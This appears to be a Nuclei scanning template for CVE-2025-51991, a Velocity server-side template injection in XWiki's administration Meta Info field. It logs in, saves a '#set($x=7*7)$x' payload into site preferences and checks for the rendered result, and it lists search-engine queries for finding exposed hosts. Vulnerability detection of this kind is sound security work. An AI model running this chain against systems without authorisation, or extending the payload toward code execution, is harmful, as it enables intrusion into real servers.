XWiki <= 17.3.0 contains a server-side template injection caused by improper validation of Apache Velocity template code in the Administration interface HTTP Meta Info field, letting authenticated administrators execute arbitrary template logic.
PoC代码[已公开]
id: CVE-2025-51991
info:
name: XWiki <= 17.3.0 - Server-Side Template Injection (SSTI)
author: 0x_Akoko
severity: critical
description: |
XWiki <= 17.3.0 contains a server-side template injection caused by improper validation of Apache Velocity template code in the Administration interface HTTP Meta Info field, letting authenticated administrators execute arbitrary template logic.
impact: |
Authenticated administrators can execute arbitrary template logic, potentially exposing internal server information or enabling remote code execution.
remediation: |
Update to a version later than 17.3.0 or the latest available version.
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2025-51991
- https://github.com/malcxlmj/cve-writeups/blob/main/CVE-2025-51991.md
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H
cvss-score: 9.1
cve-id: CVE-2025-51991
epss-score: 0.03554
epss-percentile: 0.8721
cwe-id: CWE-94
metadata:
max-request: 5
verified: true
vendor: xwiki
product: xwiki
shodan-query: http.html:"data-xwiki-reference"
fofa-query: body="data-xwiki-reference"
tags: xwiki,ssti,template-injection,authenticated
flow: http(1) && http(2) && http(3) && http(4) && http(5)
http:
- raw:
- |
GET /bin/login/XWiki/XWikiLogin HTTP/1.1
Host: {{Hostname}}
extractors:
- type: regex
name: login_token
internal: true
regex:
- 'name="form_token" value="([^"]+)"'
group: 1
- raw:
- |
POST /bin/loginsubmit/XWiki/XWikiLogin HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
xredirect=&form_token={{login_token}}&j_username={{username}}&j_password={{password}}
matchers:
- type: dsl
dsl:
- status_code == 302
- contains(location, '/bin/view/Main/')
condition: and
internal: true
- raw:
- |
GET /bin/admin/XWiki/XWikiPreferences?editor=globaladmin§ion=Presentation HTTP/1.1
Host: {{Hostname}}
extractors:
- type: regex
name: form_token
internal: true
regex:
- 'data-xwiki-form-token="([^"]+)"'
group: 1
- raw:
- |
POST /bin/saveandcontinue/XWiki/XWikiPreferences HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
XWiki.XWikiPreferences_0_showannotations=&XWiki.XWikiPreferences_0_showcomments=&XWiki.XWikiPreferences_0_showattachments=&XWiki.XWikiPreferences_0_showhistory=&XWiki.XWikiPreferences_0_showinformation=&XWiki.XWikiPreferences_0_title=&XWiki.XWikiPreferences_0_meta=%23set%28%24x%3D7%2A7%29%24x&XWiki.XWikiPreferences_0_webcopyright=&XWiki.XWikiPreferences_0_version=&form_token={{form_token}}&xcontinue=%2Fbin%2Fadmin%2FXWiki%2FXWikiPreferences%3Feditor%3Dglobaladmin%26section%3DPresentation&xredirect=%2Fbin%2Fadmin%2FXWiki%2FXWikiPreferences%3Feditor%3Dglobaladmin%26section%3DPresentation&classname=XWiki.XWikiPreferences&formactionsac=Save
matchers:
- type: dsl
dsl:
- status_code == 302
internal: true
- raw:
- |
GET /bin/view/XWiki/XWikiPreferences HTTP/1.1
Host: {{Hostname}}
redirects: true
max-redirects: 2
matchers:
- type: dsl
dsl:
- 'status_code == 200'
- 'regex("XWikiPreferences\"[^>]*>\\s*49\\s*<", body)'
condition: and
# digest: 4a0a00473045022079f39b11a7ff2360ac9569f483959d097d41c12b8cde917e6baed1d57e41452f022100b96ae10ef4c8012431c9eeb6f912abbdd04507b45ca3785b0a0a6db4c9075f79:922c64590222798bb761d5b6d8e72950